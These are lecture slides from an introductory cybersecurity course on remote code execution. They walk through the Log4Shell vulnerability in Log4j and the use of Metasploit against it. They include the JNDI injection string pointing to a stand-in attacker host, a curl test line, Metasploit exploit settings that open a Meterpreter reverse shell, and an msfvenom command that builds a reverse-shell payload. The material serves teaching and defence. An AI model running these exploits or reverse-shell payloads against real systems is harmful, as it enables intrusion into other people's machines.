CS 3710: Intro to Cybersecurity (slides): General exploitation techniques

# General exploitation techniques
## CS 3710: Intro to Cybersecurity

===

## Remote code execution

---

## What's an RCE?

_**Arbitrary code execution (ACE):**_ the ability to run a command or a piece of
code on a target machine.

_**Remote code execution (RCE):**_ an ACE that can be performed over a network.

</div>
<div class="fragment">

From an attacker's point of view, RCE/ACE vulnerabilities are extremely
vaulable, as they can provide an initial foothold into a victim's network.

</div>

notes:

References:
- [Arbitrary code execution on
  Wikipedia](https://en.wikipedia.org/wiki/Arbitrary_code_execution)

---

## Example: Log4Shell

_**Log4Shell**_ is a remote code execution vulnerability affecting Log4j, a
popular logging library for Java.

It was revealed in December 2021 and estimated to affect hundreds of millions of
devices.

</div>

</div>
<div class="col">

<figure>
  <img src="../../img/exploitation/log4shell.webp">
  <figcaption>
  
*Source:* LunaSec

</figcaption>
</figure>

</div>

</div>
</div>

notes:

- [LunaSec writeup](https://www.lunasec.io/docs/blog/log4j-zero-day/)

---

## Example: Log4Shell

<pre>
<code class="java" data-trim
  data-line-numbers="1-20|13-16" data-fragment-index="0">
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.*;

public class ExampleHandler implements HttpHandler {

static Logger log = LogManager.getLogger(ExampleHandler.class.getName());

public void handle(HttpExchange he) throws IOException {
    String apiVersion = he.getRequestHeader("X-Api-Version");

// This line triggers the RCE by logging the attacker-controlled
    // HTTP header. The attacker can set their X-Api-Version header
    // to: ${jndi:ldap://some-attacker.com/a}
    log.info("Requested Api Version:{}", apiVersion);

...
  }
}
</pre>
</code>

*Source: LunaSec*

</div>
<div class="fragment fade-in" data-fragment-index="0">

Log4j prints out a string formatted using an attacker-controlled input (in this
case, the `X-Api-Version` HTTP header).

</div>
</div>

notes:

- [LunaSec
  PoC](https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code)

---

## Example: Log4Shell

Normally, we wouldn't think that anything bad would happen in this code! This is
roughly equivalent to the following Python code:

```python
import logging

# Handle HTTP request...

logger = logging.getLogger()
logger.info("Requested Api Version: %s", apiVersion)
# If e.g. apiVersion = "1.1", this prints "Requested Api Version: 1.1"
```

Unfortunately, an attacker can exploit the [Java Naming and Directory Interface
(JNDI)](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)
to trick Log4j into executing arbitrary code.

</div>

notes:

- Blackhat 2016 talk on JNDI: "A Journey from JNDI/LDAP Manipulation to Remote
  Code Execution Dream Land" by Alvaro Muñoz (@pwntester) and Oleksandr Mirosh.
  [Link](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)

---

## Aside: JNDI

JNDI is a Java programming interface for Java programs to look up data and
resources in the form of Java objects.

The important point is that JNDI allows Java programs to load and use a Java
class file, served to it remotely.

</div>

<div class="col">
  <div class="image-background">
  
<figure>
  <img src="../../img/exploitation/jndi-oracle.gif">
  <figcaption>
  
  *Source: [Oracle Java
  Documentation](https://docs.oracle.com/javase/tutorial/jndi/overview/index.html)*
  
  </figcaption>
</figure>

</div>
  </div>
</div>

notes:

JNDI = Java Naming and Directory Interface

References:
- [Wikipedia](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface)

---

## Log4j lookups

Log4j provides support for "lookups". These lookups allow you to attach
different bits of context to logs, which can be very useful when you're
debugging a problem.

One such lookup method loads data from JNDI.

notes:

- [Lookups
  documentation](https://logging.apache.org/log4j/2.x/manual/lookups.html)

---

## Log4Shell exploit steps

Data containing the malicious payload `${jndi:ldap://evil.com/exploit}` gets
uploaded to the victim's server in some way.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="0">

The server logs the data/request containing the malicious payload.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="1">

The Log4j vulnerability triggers, making a request to the attacker-controlled
server `evil.com/exploit`

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="2">

The attacker's server responds with a Java class file, which then gets retrieved
and injected into the victim's server process.

</div>
</div>

---

## Log4Shell demo

notes:

- See LunaSec's writeup for the container image and methodology:
  https://www.lunasec.io/docs/blog/log4j-zero-day/#reproducing-locally
- Testing with curl: curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'

===

## Metasploit

---

## Intro to Metasploit

_**Metasploit**_ is a penetration testing framework for running security
assessments. It has a large array of features, including:

- Collecting target data into shared databases
- Running vulnerability scans
- Identify known vulnerabilities and run exploits for them
- And more!

</div>

<figure>
  <img src="../../img/exploitation/metasploit-logo.svg">
  <figcaption>
  
*Source: Rapid7 / Metasploit*

</figcaption>
</figure>

</div>
</div>

notes:

References:

- [Metasploit documentation](https://docs.rapid7.com/metasploit/)

---

## Setting up reverse shells

There are a number of things we might want to do after we obtain remote code
execution. One of those things is setting up a _**reverse shell**_.

---

## Setting up reverse shells

</figcaption>
</figure>

---

## Setting up reverse shells

</figcaption>
</figure>

notes:

Various reasons we might want to use a reverse shell:
- A little stealthier -- we don't have to open up a new listening port on the
  remote machine. In some cases you can obtain a reverse shell without having to
  start a new process.
- Not always possible for us to connect to a different port on the exploited
  machine, e.g. if it uses NAT (Network Address Translation) and isn't directly
  reachable.

---

## Using Metasploit against Log4Shell

See what modules are available to run against hosts that are vulnerable to
Log4Shell:

```text
msf6 > search log4shell
```

</figcaption>
</figure>

---

## Using Metasploit against Log4Shell

Load a module and see the options that are available for it.

```text
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > options
```

You can also run `info` to learn more about the module's functionality.

</figcaption>
</figure>

---

## Using Metasploit against Log4Shell

Set options and run module:

<pre>
<code class="text" data-trim
      data-line-numbers="1-13|1-2|4-5|7-12" data-fragment-index="0">
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS terminal.example.com
RHOSTS => terminal.example.com

msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080

msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST desktop.example.com
SRVHOST => desktop.example.com

msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVPORT 33889
SRVPORT => 33889

msf6 auxiliary(scanner/http/log4shell_scanner) > exploit
</code>
</pre>

`RHOSTS`: the host(s) that you're attacking

</div>
  <div class="fragment fade-in-then-out" data-fragment-index="1">

`RPORT`: the port that the potentially vulnerable service is listening on.

</div>
  <div class="fragment fade-in" data-fragment-index="2">

`SRVHOST`, `SRVPORT`: the network interface/port to run the LDAP server on

</div>
</div>

---

## Using Metasploit against Log4Shell

Set up a listener to catch reverse shells:

<pre>
<code class="text" data-trim
      data-line-numbers="1-12|1|3-4|6-10" data-fragment-index="0">
msf6 > use exploit/multi/http/log4shell_header_injection

msf6 exploit(...) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http

msf6 exploit(...) > set LHOST desktop.example.com
LHOST => desktop.example.com

msf6 exploit(...) > set LPORT 33445
LPORT => 33445

msf6 exploit(...) > run
</pre>
</code>

`exploit/multi/http/log4shell_header_injection` is an exploit against systems
vulnerable to Log4Shell

</div>
  <div class="fragment fade-in-then-out" data-fragment-index="1">

We use the `java/meterpreter/reverse_http` payload, which will allow us to
obtain a Meterpreter reverse shell

</div>
  <div class="fragment fade-in-then-out" data-fragment-index="2">

`LHOST` and `LPORT`: the network interface/port to use to start the reverse
shell

</div>
</div>

---

## Other Metasploit tools: `msfvenom`

`msfvenom` is a tool for generating and encoding payloads. You can use this with
Metasploit or with another tool to exploit a vulnerability.

</div>

Generate payload:

```bash
$ msfvenom --arch x64 \
    --platform linux \
    --payload linux/x64/meterpreter_reverse_http \
    --format elf \
    LHOST=desktop.example.com LPORT=1234 > payload.bin 
```

</div>
<div class="fragment" data-fragment-index="1">

Run handler:

```text
msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http

msf6 exploit(multi/handler) > run
```

</div>

notes:

- [Msfvenom from Offensive
  Security](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)

- [Shikata Ga Nai encoder -- blogpost by
  Mandiant](https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong)